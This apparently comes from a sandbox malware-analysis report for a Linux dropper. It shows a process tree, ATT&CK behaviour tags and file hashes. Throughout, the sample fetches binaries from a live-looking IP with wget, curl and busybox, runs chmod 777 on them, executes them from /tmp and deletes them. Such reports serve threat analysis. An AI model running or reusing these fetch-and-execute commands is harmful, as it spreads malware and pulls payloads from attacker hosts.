/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:940
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:946
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:952
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:958
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:964
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:970
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:976
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:979
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97